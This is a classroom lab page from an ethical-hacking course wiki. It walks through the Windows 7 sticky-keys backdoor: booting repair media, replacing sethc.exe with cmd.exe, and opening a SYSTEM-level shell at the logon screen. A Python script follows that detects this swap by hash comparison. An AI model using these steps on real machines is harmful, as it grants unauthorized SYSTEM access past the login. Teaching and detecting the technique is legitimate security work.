Class 7 Lab 1 ‐ Windows 7 Local PE - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

Task 1: Mount the OS and Enter the CMD

Step 1

  • Boot the machine from a Windows OS CD instead of the existing Windows 7 OS.

Step 2

  • Open the command prompt instead of installing the system.
  1. Select “Repair your computer”.
  2. In the next screen, click Next to choose the Windows 7 operating system.
  3. Select “Command prompt”.

Task 2: Switch sethc.exe with cmd.exe

Step 1

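  • List the local disks to find the installed Windows volume, then back up the sethc.exe file in windows\system32 and replace it with cmd.exe.
rem List the drive letters; the installed Windows volume is D: in this lab.
wmic logicaldisk get name
D:
cd \windows\system32
rem Back up the original, then overwrite it (answer "yes" at the prompt).
copy sethc.exe sethc2.exe
copy cmd.exe sethc.exe
yes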

Step 2

  • Restart the virtual machine from the command prompt and launch sethc.exe from the Windows logon screen. Note that cmd.exe opens instead of sethc.exe, and that it runs with NT AUTHORITY\SYSTEM privileges.
  1. Open the devices tab to unmount the disk image.
  2. Type shutdown -r from the command prompt to restart.
  3. After restarting the machine, press Shift five times.
  4. Cmd.exe should open instead of sethc.exe.
  5. Type “whoami” and note that it says “nt authority\system”, which is the highest privileged user.
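
A defender-side check for the swap performed in Task 2, as an added example that is not part of the original lab: it inspects a System32 folder (live, or from an offline-mounted image) and reports when sethc.exe is a copy of cmd.exe or when the lab's sethc2.exe backup is present. The function names and the sample directory built by `build_sample` are assumptions made for this example, and the sample file contents are constructed placeholders.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256(path):
    """Hex SHA-256 of a file."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def find_ci(directory, name):
    """Case-insensitive lookup, so an image mounted on Linux also works."""
    for entry in Path(directory).iterdir():
        if entry.is_file() and entry.name.lower() == name.lower():
            return entry
    return None

def audit_sethc(system32):
    """Return findings for the sethc.exe swap performed in Task 2."""
    sethc = find_ci(system32, "sethc.exe")
    cmd = find_ci(system32, "cmd.exe")
    backup = find_ci(system32, "sethc2.exe")  # backup name used by the lab
    if sethc is None:
        return ["sethc.exe is missing"]
    findings = []
    if cmd is not None and sha256(sethc) == sha256(cmd):
        findings.append("sethc.exe is byte-identical to cmd.exe")
    if backup is not None:
        findings.append("backup copy sethc2.exe is present")
        if sha256(backup) != sha256(sethc):
            findings.append("sethc.exe differs from sethc2.exe")
    return findings

def build_sample(swapped):
    """Constructed stand-in for System32; file contents are placeholders."""
    d = Path(tempfile.mkdtemp())
    (d / "cmd.exe").write_bytes(b"MZ constructed cmd body")
    (d / "sethc.exe").write_bytes(b"MZ constructed sethc body")
    if swapped:  # replay the two copy commands from Task 2
        (d / "sethc2.exe").write_bytes((d / "sethc.exe").read_bytes())
        (d / "sethc.exe").write_bytes((d / "cmd.exe").read_bytes())
    return d

if __name__ == "__main__":
    for swapped in (False, True):
        print("swapped" if swapped else "clean", audit_sethc(build_sample(swapped)))
```

A hash match with cmd.exe only catches this exact swap; comparing sethc.exe against a known-good copy from the same Windows build is the stronger check.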